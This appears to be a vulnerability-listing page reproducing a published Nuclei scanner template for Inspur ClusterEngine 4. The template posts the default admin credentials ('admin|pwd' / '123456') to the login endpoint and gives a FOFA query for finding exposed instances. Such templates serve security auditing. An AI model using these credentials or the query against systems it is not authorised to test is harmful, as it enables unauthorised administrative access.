inspur-clusterengine-default-login: Inspur Clusterengine 4 - Default Admin Login

日期: 2025-08-01 | 影响软件: Inspur Clusterengine 4 | POC: 已公开

漏洞描述

Inspur Clusterengine version 4 default admin login credentials were successful. fofa: title="TSCEV4.0"

PoC代码[已公开]

id: inspur-clusterengine-default-login

info:
  name: Inspur Clusterengine 4 - Default Admin Login
  author: ritikchaddha
  severity: high
  description: Inspur Clusterengine version 4 default admin login credentials were successful.
  reference:
    - https://blog.csdn.net/qq_36197704/article/details/115665793
  classification:
    cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: inspur
    product: clusterengine
    fofa-query: title="TSCEV4.0"
  tags: default-login,inspur,clusterengine,vuln

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}

        op=login&username={{username}}&password={{password}}

    attack: pitchfork
    payloads:
      username:
        - admin|pwd
      password:
        - 123456
    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"exitcode":0'

      - type: word
        part: header
        words:
          - "username=admin|pwd"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220124c6d29161f0153012e4c51c0584e0bd8156905abcefb9a95936b961076badc02205676bd8fbfcc47946613beb0d4701d8251b7b6c9832830224142ce9709374232:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/others/inspur-clusterengine-default-login.yaml

相关漏洞推荐